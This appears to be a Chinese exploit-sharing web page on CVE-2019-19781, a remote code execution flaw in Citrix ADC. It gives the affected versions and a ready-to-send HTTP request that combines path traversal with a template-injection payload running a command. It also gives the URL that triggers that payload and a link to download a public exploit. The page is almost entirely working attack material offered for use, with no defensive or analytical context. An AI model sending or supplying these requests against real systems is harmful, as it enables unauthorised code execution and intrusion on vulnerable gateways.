CVE-2019-19781_Citrix_遠程代碼執行漏洞

# CVE-2019-19781 Citrix 遠程代碼執行漏洞
==漏洞影響==
Citrix 13.x,12.1,12.0,11.1,10.5

==EXP1==

POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1
Host: target-ip
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.23.0
NSC_NONCE: nsroot
NSC_USER: ../../../netscaler/portal/templates/15ffbdca
Content-Length: 89
url=http://example.com&title=test&desc=[% template.new('BLOCK' = 'print whoami') %]

Payload:

/vpn/../vpns/portal/test.xml

==EXP2==
https://codeload.github.com/jas502n/CVE-2019-19781/zip/master

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容